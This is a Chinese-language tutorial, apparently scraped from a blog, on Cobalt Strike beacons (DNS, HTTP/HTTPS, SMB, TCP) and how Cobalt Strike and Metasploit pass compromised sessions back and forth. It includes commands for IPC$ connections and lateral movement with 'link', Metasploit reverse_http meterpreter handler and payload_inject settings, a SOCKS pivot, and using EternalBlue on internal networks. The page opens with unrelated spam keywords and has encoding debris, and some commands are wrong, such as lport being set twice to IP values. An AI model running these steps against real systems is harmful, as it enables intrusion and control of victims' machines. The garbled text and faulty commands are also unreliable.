石家庄专业商城网站制作,外贸网站 测速,公司做彩票网站违法吗,低价网站建设推广报价今天来讲一下cs里面的beacon 其实cs真的功能很强大#xff0c;自带代理创建#xff0c;自带beacon通信#xff01;#xff01;#xff01;
一张图#xff0c;就能说明beacon的工作原理 1.Beacon
每当有一台机器上线之后#xff0c;我们都会选择sleep时间#xff0c;…今天来讲一下cs里面的beacon 其实cs真的功能很强大自带代理创建自带beacon通信
一张图就能说明beacon的工作原理 1.Beacon
每当有一台机器上线之后我们都会选择sleep时间并且进入会话就是这样 可以看见有一个beacon的字段每一次我们敲命令的时候都会再它之后那么什么是beacon呢 Beacon是Cobalt Strike为高级攻击者建模的Payload。使用Beacon通过HTTPHTTPS或DNS出口网络。而且Beacon非常灵活支持异步和交互式通信。异步通信既低又慢。Beacon将通讯本地下载任务然后进入睡眠状态。交互式通信实时发生。 在我们点击监听器的时候就能看见这个 下面我们就来分别讲讲这几种beacon的用法
2.DNS Beacon DNS Beacon顾名思义就是使用DNS请求将Beacon返回。这些 DNS 请求用于解析由你的 CS 团队服务器作为权威 DNS 服务器的域名。DNS 响应告诉 Beacon 休眠或是连接到团队服务器来下载任务。DNS 响应也告诉 Beacon 如何从你的团队服务器下载任务。 感觉有点听不懂 来看一张图片 当我们将dnsbeacon嵌入到靶机的一个程序时候如果这个smbbeacon运行起来就会逐级递归的去找我们的服务器并且通过dns_txt的方式传输数据缺点是这个会比常规的慢
3.HTTP/HTTPS Beacon 这两个beacon的原理是通过发送http请求与受害主机通信来传达命令, 以此实现控制效果 相比于HTTP的beacon HTTPS的beacon多了一个加密传输 配置呢也比较简单就是绑个ip然后设置一个端口就好
优点是传输数据快, 缺点是隐蔽性差, 容易被防火墙或内网审计工具拦截
4.SMB Beacon SMB Beacon使用命名管道通过父级Beacon进行通讯当两个Beacons连接后子Beacon从父Beacon获取到任务并发送。 因为连接的Beacons使用Windows命名管道进行通信此流量封装在SMB协议中所以SMB Beacon相对隐蔽绕防火墙时可能发挥奇效。 在前面提到的三个beacon里面都是只能用于出网的机器SMB和TCPbeacon都可以用在不出网和出网的机器
下面是它的原理 这样说起来好像有点干来个拓扑环境演示一下 抽象点的拓扑 首先是把win7上线了这个进入内网的第一步不多说 然后设置smb beacon 然后生成一个多阶段的木马 然后不管通过什么方式让这个木马丢到下一个目标的机器并且让他运行起来
当然你也要有一个ipc连接
net use \\目标ip\ipc$ 密码 /user:用户名
再link一下
link 目标ip
就能上线到了 内网的server 这时候有人就会问了还能在跨一段网段吗
肯定可以啊。我们再加一个网段 还是建立连接上马运行link 这样就能上线三个网段的机器了就算是有更多的网段也是可以的毕竟windows默认开放445端口这就是为什么smb beacon 在内网中有奇效 不信 给你看一下更清晰的图三层网段 5.TCP Beacon
TCPbeacon也是一般用在上线内网的机器走的是tcp的协议
先去清空一下环境 创建一个TCP监听器 并且生成对应的stage木马建立管道运行
connect 目标ip 端口(一开始tcp监听器的木马)
但是呢 牛魔的怎么连接不上 哎这翻车了但是网上说这样是可以的还是用回smb吧
6.联动beacon
这种beacon可以用于和msf梦幻联动之前讲过再讲一遍 cs在不添加插件的情况下的攻击性不强相对于msf的众多攻击模块所以我们很多时候就要联动 先去msfconsole监听payload选reverse_http
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport kali的ip
set lport 你自己写一个ip
run 再是监听器 spawn一下(前提你要有cs已经上线了机器) 成功上线 但是这样也只是联动装装b还可以还是没有用到kali的攻击模块别急有反转
这里用到pivot模块其实就是把它当作一台开了socks服务的服务器 开启服务 开始操作 复制下面这段话 回到msfconsole background一下
然后去敲上这条命令
setg Proxies socks4:192.168.246.153:20987
set ReverseAllowProxy true
然后你就可以用永恒之蓝打内网了
但是大部分都是不行的 看别人试过也是这样不行一旦跨了一个网段就是能扫出漏洞但是打不进去真的很奇怪可能是虚拟机的问题吧 7.MSF联动CS
上面讲了cs联动msf但是一般我们都是先上线msf再上线的cs啊别急还是有反转
我把上面那台打不到的机器放在了外网瞬间就能打到了大无语事件 然后按照以下命令敲
bguse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset lhost cs的ipset lport cs的端口set disablepayloadhandler truerun
然后去cs配置监听 然后就能上线了